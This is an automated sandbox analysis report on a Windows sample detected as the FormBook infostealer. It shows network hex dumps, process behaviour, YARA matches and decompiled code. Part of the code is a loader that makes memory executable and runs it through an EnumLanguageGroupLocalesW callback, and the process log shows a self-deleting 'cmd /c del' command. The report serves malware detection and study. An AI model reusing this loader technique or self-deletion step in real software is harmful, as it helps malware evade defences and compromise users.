20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-
Aug 3, 2021 22:19:40.547755003 CEST | 4479 | IN | Data Raw: 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 74 79 6c 65 3a 20 64 6f 74 74 65 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
Data Ascii: decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{
Aug 3, 2021 22:19:40.547775030 CEST | 4480 | IN | Data Raw: 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 30 20 6e 6f 6e 65 3b
Data Ascii: ding: 12px; border: 1px solid #ddd; border-bottom: 0 none; line-height: 18px; font-size:16px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-f
Aug 3, 2021 22:19:40.547797918 CEST | 4482 | IN | Data Raw: 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20
Data Ascii: color: #333; height: 100%; display: inline-block; border-left: 1px solid #fff; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; }
Aug 3, 2021 22:19:40.547816038 CEST | 4483 | IN | Data Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 20 74 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69
Data Ascii: color: #ccc; } .exception-var table tbody{ font-size: 13px; font-family: Consolas,"Liberation Mono",Courier,""; } .exception-var table td{ padding: 0 6px;
Aug 3, 2021 22:19:40.547830105 CEST | 4484 | IN | Data Raw: 63 6f 6c 6f 72 3a 20 23 30 30 38 20 7d 20 20 2f 2a 20 61 20 6d 61 72 6b 75 70 20 74 61 67 20 6e 61 6d 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 61 74 6e 20 7b 20 63 6f 6c 6f 72 3a 20 23 36 30 36 20
Data Ascii: color: #008 } /* a markup tag name */ pre.prettyprint .atn { color: #606 } /* a markup attribute name */ pre.prettyprint .atv { color: #080 } /* a markup attribute value */ pre.prettyprint .dec, pre.prettyprint .var


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Memory Usage

                                            High Level Behavior Distribution

                                            Behavior

                                            System Behavior

                                            General

                                            Start time:22:18:09
                                            Start date:03/08/2021
                                            Path:C:\Users\user\Desktop\mvui1vY6Mo.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\mvui1vY6Mo.exe'
                                            Imagebase:0x2f0000
                                            File size:367359 bytes
                                            MD5 hash:059B1244AC9FDA54DE086692DB4B5A08
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:22:18:10
                                            Start date:03/08/2021
                                            Path:C:\Users\user\Desktop\mvui1vY6Mo.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\mvui1vY6Mo.exe'
                                            Imagebase:0x2f0000
                                            File size:367359 bytes
                                            MD5 hash:059B1244AC9FDA54DE086692DB4B5A08
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:22:18:15
                                            Start date:03/08/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff6fee60000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:22:18:52
                                            Start date:03/08/2021
                                            Path:C:\Windows\SysWOW64\cmmon32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                            Imagebase:0x1250000
                                            File size:36864 bytes
                                            MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:22:18:54
                                            Start date:03/08/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
                                            Imagebase:0x11d0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:22:18:54
                                            Start date:03/08/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                              Executed Functions

                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011307B4
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 011307DE
                                              • ReadFile.KERNELBASE(00000000,00000000,0113026C,?,00000000), ref: 011307F5
                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 01130817
                                              • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,011301AE,7FDFFF66), ref: 0113088A
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 01130895
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,011301AE), ref: 011308E0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                              • String ID:
                                              • API String ID: 656311269-0
                                              • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                              • Instruction ID: d3f491d82dbd69a24473577c737763da4e4d65f3f9e060d600d18cc46cf2fdfc
                                              • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                              • Instruction Fuzzy Hash: 4361A031E00709ABDB18DBA8C880BAEBBF5AF9C710F148199F505FB395E7749D418B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00304CC1
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00304CE9
                                              • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00304D00
                                              • VirtualAlloc.KERNELBASE(00000000,000014A5,00003000,00000040), ref: 00304D49
                                              • und_memcpy.LIBVCRUNTIME ref: 00304D59
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00304D6A
                                              • und_memcpy.LIBVCRUNTIME ref: 00304D79
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: AllocVirtual$Fileund_memcpy$CreateRead
                                              • String ID:
                                              • API String ID: 1653714324-0
                                              • Opcode ID: 9e655a3dfdabb047e96f644093c3ba9801302c57551a3dafedf4f431170e38c9
                                              • Instruction ID: fe576f8e3cdb6a3f455a41e572b14af8d7cc4247133e0c78877aa169c40f32fd
                                              • Opcode Fuzzy Hash: 9e655a3dfdabb047e96f644093c3ba9801302c57551a3dafedf4f431170e38c9
                                              • Instruction Fuzzy Hash: 1751F4B0942624AFEB118B75CC79FEF7BE8EF45310F115155FA40E7292E6749A048B60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F171B() {
                                              				_Unknown_base(*)()* _t1;
                                              
                                              				_t1 = SetUnhandledExceptionFilter(E002F1727); // executed
                                              				return _t1;
                                              			}

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00001727,002F10B1), ref: 002F1720
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 7a80d5fe60d2ae55a43193992df627fd7e7c65085a675a49347e890a6b2eba81
                                              • Instruction ID: 284a2480cef46ec0695544d9d98b3df6c2fae6c2b5638bd916b3016e7daa65c5
                                              • Opcode Fuzzy Hash: 7a80d5fe60d2ae55a43193992df627fd7e7c65085a675a49347e890a6b2eba81
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 87%
                                              			E002FCC60(struct HINSTANCE__* _a4) {
                                              				long _v8;
                                              				struct tagMSG _v36;
                                              				struct _WNDCLASSW _v76;
                                              				intOrPtr _t30;
                                              
                                              				_v76.style = 0;
                                              				_v76.lpfnWndProc = 0;
                                              				_v76.cbClsExtra = 0;
                                              				_v76.cbWndExtra = 0;
                                              				_v76.hInstance = 0;
                                              				_v76.hIcon = 0;
                                              				_v76.hCursor = 0;
                                              				_v76.hbrBackground = 0;
                                              				_v76.lpszMenuName = 0;
                                              				_v76.lpszClassName = 0;
                                              				_v76.lpszClassName = 0x304a04;
                                              				_v76.hInstance = _a4;
                                              				_v76.hbrBackground = GetSysColorBrush(0xf);
                                              				_v76.lpfnWndProc = E002FCAB0;
                                              				_v76.hCursor = LoadCursorW(0, 0x7f00);
                                              				RegisterClassW( &_v76);
                                              				E002FC320(_a4, 0x3059b0, 0x3059c4);
                                              				_t30 =  *0x3059b0; // 0x12f0ef0
                                              				 *0x3059c0 = _t30;
                                              				VirtualProtect(0x304b90, 0x28c, 0x40,  &_v8); // executed
                                              				__imp__EnumLanguageGroupLocalesW(0x304b90, 2, 0, 0); // executed
                                              				CreateWindowExW(0, _v76.lpszClassName, L"CLOUDY PEN: beta 0.0", 0x10cf0000, 0x64, 0x64, 0x15e, 0xfa, 0, 0, _a4, 0);
                                              				while(GetMessageW( &_v36, 0, 0, 0) != 0) {
                                              					TranslateMessage( &_v36);
                                              					DispatchMessageW( &_v36);
                                              				}
                                              				return _v36.wParam;
                                              			}

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FCC99
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 002FCCB0
                                              • RegisterClassW.USER32 ref: 002FCCBD
                                              • VirtualProtect.KERNELBASE(00304B90,0000028C,00000040,?), ref: 002FCCEC
                                              • EnumLanguageGroupLocalesW.KERNELBASE(00304B90,00000002,00000000,00000000), ref: 002FCCFD
                                              • CreateWindowExW.USER32 ref: 002FCD2B
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FCD3B
                                              • TranslateMessage.USER32(?), ref: 002FCD49
                                              • DispatchMessageW.USER32 ref: 002FCD53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Message$BrushClassColorCreateCursorDispatchEnumGroupLanguageLoadLocalesProtectRegisterTranslateVirtualWindow
                                              • String ID: CLOUDY PEN: beta 0.0
                                              • API String ID: 1824785041-196906049
                                              • Opcode ID: 38a1beb99710dcac6768da31e043867376f209c08b1f0fb9f33a4d3c4c138b3c
                                              • Instruction ID: 1bc684bc4ca9132823ae970a1d0781f421ec50fc9c7b4ef2174188eefc2bb246
                                              • Opcode Fuzzy Hash: 38a1beb99710dcac6768da31e043867376f209c08b1f0fb9f33a4d3c4c138b3c
                                              • Instruction Fuzzy Hash: 6131ECB0A41308AFEB51DFA4ED5AFEE7BB4AB08B50F104129F609BA2D0D7B05900CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01131149
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: D
                                              • API String ID: 963392458-2746444292
                                              • Opcode ID: 7b4a421de166fbbaeac7bba4d8a8e0671d54247360fafff122133854407e8822
                                              • Instruction ID: 6c46bb4e6b0897ec5adbc3c8ad7d5d3914c0a45a513c285f2043d4e5c418839d
                                              • Opcode Fuzzy Hash: 7b4a421de166fbbaeac7bba4d8a8e0671d54247360fafff122133854407e8822
                                              • Instruction Fuzzy Hash: 54020470E00209EFEB18DF98C985BADBBF5BF48304F244069E515BB295D770AA85CF11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F4EB8(void* __ecx) {
                                              				void* _t6;
                                              				void* _t14;
                                              				void* _t18;
                                              				WCHAR* _t19;
                                              
                                              				_t14 = __ecx;
                                              				_t19 = GetEnvironmentStringsW();
                                              				if(_t19 != 0) {
                                              					_t12 = (E002F4E81(_t19) - _t19 >> 1) + (E002F4E81(_t19) - _t19 >> 1);
                                              					_t6 = E002F3696(_t14, (E002F4E81(_t19) - _t19 >> 1) + (E002F4E81(_t19) - _t19 >> 1)); // executed
                                              					_t18 = _t6;
                                              					if(_t18 != 0) {
                                              						E002FA5E0(_t18, _t19, _t12);
                                              					}
                                              					E002F365C(0);
                                              					FreeEnvironmentStringsW(_t19);
                                              				} else {
                                              					_t18 = 0;
                                              				}
                                              				return _t18;
                                              			}

                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 002F4EBC
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002F4EFC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: EnvironmentStrings$Free
                                              • String ID:
                                              • API String ID: 3328510275-0
                                              • Opcode ID: 912693c7c9a06ac53bc7dfd0dbc625a41d0c42ab2f1cbc66c38982dd1c2e896f
                                              • Instruction ID: 43d697fae9505c35f4d8d123f3c950c7ffe921e8aedf9ab9363d9a19cbe19871
                                              • Opcode Fuzzy Hash: 912693c7c9a06ac53bc7dfd0dbc625a41d0c42ab2f1cbc66c38982dd1c2e896f
                                              • Instruction Fuzzy Hash: D9E02B335145192BD22232297C89E7FAA0CDFC27F17160135F30CC6251EE608E1184B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ExitProcess.KERNEL32(00000000,00034E5B,00034E5B,00034E5B), ref: 01130BE0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 4841719ca02d087dd677387353d7691451242aab44d5342b267abb8745a2932a
                                              • Instruction ID: eb6116dd9b347da6ac0050cc2cbc031ccb05ad769252bb200a2812c3570daee1
                                              • Opcode Fuzzy Hash: 4841719ca02d087dd677387353d7691451242aab44d5342b267abb8745a2932a
                                              • Instruction Fuzzy Hash: 9F41D619E54348A9DB60DBE4F852BBDB7B1AF48B10F205507F908EE2E0E3750D91D74A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E002F3727(void* __ecx, signed int _a4, signed int _a8) {
                                              				void* __esi;
                                              				void* _t8;
                                              				void* _t12;
                                              				signed int _t13;
                                              				void* _t15;
                                              				signed int _t16;
                                              				signed int _t18;
                                              				long _t19;
                                              
                                              				_t15 = __ecx;
                                              				_t18 = _a4;
                                              				if(_t18 == 0) {
                                              					L2:
                                              					_t19 = _t18 * _a8;
                                              					if(_t19 == 0) {
                                              						_t19 = _t19 + 1;
                                              					}
                                              					while(1) {
                                              						_t8 = RtlAllocateHeap( *0x305908, 8, _t19); // executed
                                              						if(_t8 != 0) {
                                              							break;
                                              						}
                                              						__eflags = E002F3087();
                                              						if(__eflags == 0) {
                                              							L8:
                                              							 *((intOrPtr*)(E002F4124())) = 0xc;
                                              							__eflags = 0;
                                              							return 0;
                                              						}
                                              						_t12 = E002F61F0(_t15, _t16, _t19, __eflags, _t19);
                                              						_pop(_t15);
                                              						__eflags = _t12;
                                              						if(_t12 == 0) {
                                              							goto L8;
                                              						}
                                              					}
                                              					return _t8;
                                              				}
                                              				_t13 = 0xffffffe0;
                                              				_t16 = _t13 % _t18;
                                              				if(_t13 / _t18 < _a8) {
                                              					goto L8;
                                              				}
                                              				goto L2;
			}

                                              0x002f3727
                                              0x002f372d
                                              0x002f3732
                                              0x002f3740
                                              0x002f3740
                                              0x002f3746
                                              0x002f3748
                                              0x002f3748
                                              0x002f375f
                                              0x002f3768
                                              0x002f3770
                                              0x00000000
                                              0x00000000
                                              0x002f3750
                                              0x002f3752
                                              0x002f3774
                                              0x002f3779
                                              0x002f377f
                                              0x00000000
                                              0x002f377f
                                              0x002f3755
                                              0x002f375a
                                              0x002f375b
                                              0x002f375d
                                              0x00000000
                                              0x00000000
                                              0x002f375d
                                              0x00000000
                                              0x002f375f
                                              0x002f3738
                                              0x002f3739
                                              0x002f373e
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002F3C97,00000001,00000364,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F3768
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 5c05336bf4cfdb06342eb76cded910e2ceb246b42bd079d5b804b297705a1e20
                                              • Instruction ID: f8184019f39641e999210ec5418c86fc6af08867dfd5fdb08090d011095c9de1
                                              • Opcode Fuzzy Hash: 5c05336bf4cfdb06342eb76cded910e2ceb246b42bd079d5b804b297705a1e20
                                              • Instruction Fuzzy Hash: 5EF090B262112DA6DA25FE229C05A7BF7489B417F0B144131AE08D6191CA60EA20CAA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E002F3696(void* __ecx, long _a4) {
                                              				void* __esi;
                                              				void* _t4;
                                              				void* _t6;
                                              				void* _t7;
                                              				void* _t8;
                                              				long _t9;
                                              
                                              				_t7 = __ecx;
                                              				_t9 = _a4;
                                              				if(_t9 > 0xffffffe0) {
                                              					L7:
                                              					 *((intOrPtr*)(E002F4124())) = 0xc;
                                              					__eflags = 0;
                                              					return 0;
                                              				}
                                              				if(_t9 == 0) {
                                              					_t9 = _t9 + 1;
                                              				}
                                              				while(1) {
                                              					_t4 = RtlAllocateHeap( *0x305908, 0, _t9); // executed
                                              					if(_t4 != 0) {
                                              						break;
                                              					}
                                              					__eflags = E002F3087();
                                              					if(__eflags == 0) {
                                              						goto L7;
                                              					}
                                              					_t6 = E002F61F0(_t7, _t8, _t9, __eflags, _t9);
                                              					_pop(_t7);
                                              					__eflags = _t6;
                                              					if(_t6 == 0) {
                                              						goto L7;
                                              					}
                                              				}
                                              				return _t4;
			}

                                              0x002f3696
                                              0x002f369c
                                              0x002f36a2
                                              0x002f36d4
                                              0x002f36d9
                                              0x002f36df
                                              0x00000000
                                              0x002f36df
                                              0x002f36a6
                                              0x002f36a8
                                              0x002f36a8
                                              0x002f36bf
                                              0x002f36c8
                                              0x002f36d0
                                              0x00000000
                                              0x00000000
                                              0x002f36b0
                                              0x002f36b2
                                              0x00000000
                                              0x00000000
                                              0x002f36b5
                                              0x002f36ba
                                              0x002f36bb
                                              0x002f36bd
                                              0x00000000
                                              0x00000000
                                              0x002f36bd
                                              0x00000000

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 58fbc85a0cc43137314c853ce82dbaedc0d81c69f064ab047d51b3f7ca433ba6
                                              • Instruction ID: e8a5b18c55296bcd4407610f6bd94e6072965285759625050f343f9f548dec1f
                                              • Opcode Fuzzy Hash: 58fbc85a0cc43137314c853ce82dbaedc0d81c69f064ab047d51b3f7ca433ba6
                                              • Instruction Fuzzy Hash: 29E0A02122112E77EA22AA269C04B7BF64C9B023E0F150031AE05D6291CF60CE608AAC
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 76%
                                              			E002F3D62(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				char _v0;
                                              				signed int _v8;
                                              				intOrPtr _v524;
                                              				intOrPtr _v528;
                                              				void* _v532;
                                              				intOrPtr _v536;
                                              				char _v540;
                                              				intOrPtr _v544;
